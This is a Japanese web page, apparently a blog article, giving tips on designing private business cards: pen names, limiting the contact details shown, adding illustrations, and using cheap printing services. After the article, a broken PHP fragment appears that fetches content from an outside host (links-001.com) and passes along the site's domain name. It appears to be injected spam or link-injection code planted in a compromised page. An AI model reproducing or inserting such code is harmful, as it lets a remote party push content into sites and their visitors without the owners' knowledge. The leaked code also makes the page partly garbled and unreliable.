前へ
次へ

プライベート用の名刺のデザイン

サークル活動などプライベートな場面で知り合った人に渡すことができる名刺のデザインとなってくると、名前と連絡先などの情報が書いてあるのも必要な点です。
表記する名前も必ずしも本名ではなかったとしても、ペンネームなどの本名以外を名刺に明記するのもありですが、連絡先も電話番号からメールアドレス、住所など公開する範囲も限定してみると個人情報の管理も安心しやすいです。
デザインとしても写真やイラストを入れてみるのもお洒落な名刺を仕上げるのに便利です。
不特定多数などの何人かに渡すつもりで名刺を作成することを視野にいれている場合には、表記は名前のみで連絡先などの個人的な情報は後から手書きで付け加えてみるのもリスクを減らしやすくなります。
印刷もデザインだけ決まった際は専門の業者に回してしまうのも手間が省けますが、渡す人数が増えてきても本当に必要な枚数分だけ用意するのも可能になってくるからです。
安価な料金で印刷を引き受けてくれる業者もたくさんあります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top